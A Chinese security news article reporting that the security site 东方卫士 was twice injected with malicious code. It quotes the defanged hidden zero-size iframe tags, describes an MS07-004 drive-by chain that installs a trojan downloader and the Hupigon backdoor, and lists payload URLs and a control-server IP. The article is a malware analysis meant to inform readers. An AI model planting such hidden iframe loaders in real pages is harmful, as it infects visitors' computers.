东方卫士被挂马 安全网站安全谁来保证

【原创版权独家所有，如欲转载，请注明出处“赛迪网”和文章作者“T木”！违者，赛迪网将保留追究其法律责任的权利！】

【编者按：为安全起见，文中“http”均被替换为“hxxp”，“<>”均被替换为“[]”，特此说明。】

前两天有网友反映国内知名的安全网站东方卫士再次被挂载木马，这已经是东方卫士第二次暴露出存在安全隐患。

回顾

在此之前就曾发生过一次东方卫士网站首页（hxxp://www.i110.com）存在恶意代码引用的事件，如果用户没有安装过微软的MS07-004补丁程序，并且使用IE浏览器访问上述页面的话，就会感染木马病毒。

技术分析：

1. 东方卫士网站首页代码中，包含了一处对恶意网页的引用语句：

[iframe src=hxxp://***.ch/ook.html width=0 height=0][/iframe]

如图1：

2.这个被引用的恶意网页中包含了利用MS07-004漏洞的代码，使得系统能够自动下载hxxp://***.ch/xia.exe（Trojan-Downloader.Win32.agent.ddz）到本地，并运行。

3.xia.exe是个木马下载器，该木马复制自身到%system32%目录下，命名为wdfmg1r32.exe，运行后下载灰鸽子病毒hxxp://***.li/2.exe（Backdoor.Win32.Hupigon.cpb）。

4.2.exe是灰鸽子病毒最新变种，采用RootKit技术编写，隐藏进程。它复制自身到%system32%目录下，命名为system32.exe，该病毒运行后会释放文件到 %WinDir%\svchost.exe，文件大小为381440字节，并创建下面服务：

服务名：Net work nois

服务描述：Net work nois

服务程序：C:\WINNT\svchost.exe

hxxp://221.215.170.192:5600/wwwroot/（该IP对应地址为：山东省青岛市(李

沧区)网通ADSL）

染毒电脑将被黑客远程完全控制，这些操作可能是任意文件操作、注册表操作、键盘记录、下载执行远程程序、任意网络操作甚至远程开机摄像头监控等。

再次被挂马

而这一次，在东方卫士主页上，通过查看页面源代码，可以看到网页中被插入一条“[ iframe src=”指令，该指令将隐藏打开一个新的页面，这个页面伪造了浏览器无法开的错误网页，并在后台隐藏打开三个页面，进行木马下载。

打开的隐藏页面代码：

[iframe src=hxxp://www.****.cn/33/Reflector/index.htm width=0 

height=0 frameborder=0][/iframe]

在打开的伪造错误页面中会打开三个网页：

[iframe src="hxxp://www.****.cn/33/Reflector/4.htm" width="0" 

height="0" frameborder="0"][/iframe]

[iframe src="hxxp://www.****.cn/33/Reflector/2.htm" width="0" height="0" frameborder="0"]

[/iframe]

[iframe src="hxxp://www.*****.com/wm/20/5.htm" width="0" height="0" frameborder="0"]

[/iframe]

下载木马：

hxxp://www.****.cn/33/Reflector/1.exe（无效）

hxxp://www.*****.com/0.exe